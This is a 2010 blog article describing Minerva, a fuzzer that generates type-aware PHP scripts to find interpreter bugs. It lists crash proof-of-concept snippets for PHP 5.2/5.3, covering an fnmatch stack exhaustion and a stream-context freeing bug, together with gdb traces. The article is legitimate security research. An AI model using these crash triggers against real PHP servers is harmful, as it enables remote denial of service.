MOPS Submission 05 – The Minerva PHP Fuzzer

May 11th, 2010

Today it is time for the fifth external MOPS submission. It it the second submission by Mateusz Kocielski, an article about his PHP fuzzer called Minerva.

Minerva – 1.0

Mateusz Kocielski

Table of contents:

  1. Introduction
  2. Minerva
  3. Future work
  4. Appendix

-[ 1. Introduction

-[[ 1 a) Abstract

Minerva is a PHP fuzzer designed to uncover bugs in PHP internals. This document contains information about its construction, fuzzing approach, as well as the bugs discovered and future work.

-[[ 1 b) Background

Minerva is a fuzzer dedicated for the PHP language. Fuzz testing in brief is a software testing technique that provides a random/invalid data to the program and then checks if the program failed or something unexpected
happened. This technique was proposed 20 years ago by Prof. Barton Miller, he noticed that many UNIX utilities are crashing when random data is provided as an input to them. Historical background on fuzzing can be found at Miller's website [miller]. Through the years fuzz testing has evolved, many techniques was proposed and bunch of software has been released. Now it’s a valid tool for both developers and hackers to discover bugs in the software. Important thing to understand about it is that fuzzing is not substitution of testing, but it may be its notable support.

Minerva is not the first fuzzing tool dedicated for the PHP, some work has been done already. Victor Steiner [steiner] has released the PHP fuzzer as a part of a bigger project – fusil fuzzing framework [fusil], his approach was
passing random arguments into random functions, similar way of reasoning was presented by Lilxam [lilxam]. Passing random arguments to random function is ineffective because PHP cares about types. In case of this fuzzers many function calls fail at the begin because of the bad argument types or the argument number. In 2007 Calcite released PFF (PHP Fuzzing Framework) [pff].

PFF is configurable by template file, where a user can specify the function name and a list of types (string, integer or random which means that integer or string will be chosen), basing on that file, PFF is generating random
function call for PHP. All this fuzzers discovered bugs in PHP interpreter. Minerva approach is generating valid PHP scripts with determined number of function calls. Validity here should be regarded as passing some “almost
correct” arguments to the functions. The code is having the “proof of concept” status, and should be regarded as a material for the future research and development.

-[ 2. Minerva

-[[ 2 a) Description

As it was mentioned before, Minerva bases on the observation that passing random arguments to PHP functions is highly inefficient because in most cases it ends with a type error. Better approach is to care about the types and
generate scripts with "almost correct" arguments. Minerva has got the pre-defined set of initial variables as well as the database of functions with their return type and a type of arguments. Core algorithm is simple and
can be described by following pseudo-code:

1.  script <- ""
2.  X <- Initial set of variables with their types
3.  G <- Fresh variable generator
4.  F <- Function database
5.  for i in 1..n:
6.   f <- GET_RANDOM(F, X)
7.   v <- G()
8.   X <- X u <v, f result type>
9.   script <- script . v . " = " . f call with random arguments from X (but
     with proper types)
10. return script

Function GET_RANDOM from line 6 returns random function from F which arguments can be covered by variables from set X. Initial set of variables is defined in src/ function, but can be extended by
providing an init file with proper function. (i.e. function foo() { return "AAAA"; }) and adding foo function to the function database. Generated script is sliced into following sections:

 | header            |
 | init              |
 | generated script  |
 .                   .
 .                   .
 |                   |
 | fini              |
 | footer            |

Header and footer sections are defined by Minerva in src/ header() and footer() functions. Init and fini sections are optional and can be provided by user to put there some static content (e.g. some additional

-[[ 2 b) Configuration file

The function database and default options can be defined in configuration file. Configuration file is organized as follows:

main section

 default_length - number of function calls
 default_output - output script filename
 modules - list of modules
 ignore_functions - list of ignored functions
 init - initial file
 fini - fini file

functions section

 module_name = [
   return_type function_name ( arguments_types ),

For syntax details, take a look at example.conf file in conf/ directory. Configuration options could be also passed from the command line. For detailed list run program with "--help" argument.

-[[ 2 c) Discovered bugs

This paragraph presents Minerva results for PHP 5.3.2 and 5.2.13. Testing environment won't be described to encourage future users to experiment with Minerva. Tests presented here were focused on crashing PHP interpreter, if it returned SIGSEGV, the script file was kept for future research. During a few hours of the standard modules testing, the following bugs were discovered:

fnmatch() - stack exhaustion caused by glibc function fnmatch, seems not to be exploitable, but may be used to crash PHP from remote.

Proof of concept code:

     $a57 = str_repeat("A",16000000);
     $a265 = fnmatch($a57,"");
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Program received signal SIGSEGV, Segmentation fault.
  0xb7a7bb0b in fnmatch () from /lib/i686/cmov/

Freeing context before freeing stream - During php_request_shutdown() (main/main.c) context structure assigned to stream is freed before stream strucure is freed. If memory which was allocated for context is dirty, then it may cause crash. This bug may be exploitable and needs more research.

Proof of concept:

     $blah = fopen('/dev/zero','a');
     $arr = array();
     for ( $i = 0 ; $i < 5000 ; $i++ ) {
       $arr[$i] = "";
     $a88 = fread($blah,100000000000);
  $ php -v
  PHP 5.2.6-1+lenny8 with Suhosin-Patch (cli) (built: Mar 14 2010 08:14:04)
  Copyright (c) 1997-2008 The PHP Group
  Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

  (gdb) r file.php
  Starting program: /usr/bin/php file.php
  [Thread debugging using libthread_db enabled]

  Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 1215752193 bytes) in /thanks/to/dft/test.php on line 8

  Program received signal SIGSEGV, Segmentation fault.
  0x0829ed83 in php_stream_context_del_link ()
  (gdb) bt
  #0  0x0829ed83 in php_stream_context_del_link ()
  #1  0x082a05c1 in _php_stream_free ()

uninitialized memory in sqlite extension - this bug, as well as its exploitation were described in details in article which can be found in doc/sqlite.txt.

-[ 3. Future work

Minerva, for now, is limited to PHP language, but the approach used can bring good results also in case of other scripting languages like Python or Perl, as well as the testing syscalls. Supporting more targets shouldn't be hard, but it requires from Minerva to be more flexible, then Minerva will be possibly redesigned and rewritten to OCaml and will be continued as a long-term project.

In case of PHP there's still much work to do, some modules need to satisfy the conditions like passing valid ftp server in case of ftp module. Minerva now supports only this modules which can be fuzzed without 3rd party software. The second thing is that the project almost ignores the fact that PHP is an object oriented language, random class generator could be a benefit. It may include features like inheritance or overriding.

Some indexes can help to improve the Minerva efficiency. A good option is to measure how much PHP code is covered, it can be done by using gcov [gcov], and than apply some strategies (e.g. evolutionary) to cover more code.

Detecting bugs by waiting for SIGSEGV is a bit naive method, the project can use benefits of -fmudflap or other dynamic analysis tools to uncover more bugs. Research on that field needs to be done in order to increase project

If you would like to help or just you’ve got idea, comment or suggestion, please feel free to contact me.

-[ A. Licence

Minerva project is released under the BEER-WARE license.

wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return.

Borrowed from

-[ B. Contact

You can reach me at:

IRC: shm@freenode

-[ C. References:

[miller] Miller’s site on fuzzing
[pff] PHP Fuzzing Framework
[lilxam] article in french about PHP fuzzing

-[ D. Further reading material: briefly about fuzzing more on fuzzing fusil fuzzer, written in Python supporting PHP fuzzing digital dwarf fuzzers collection Fuzzing – Breaking software in an automated fashion

-[ E. Greetings:

I would like to thank very much following people for their contribution:

  • Katabu for proof-reading and patience
  • Snooty for proof-reading and feedback
  • dft-labs for providing me testing environment

-[ F. Download:


blog comments powered by Disqus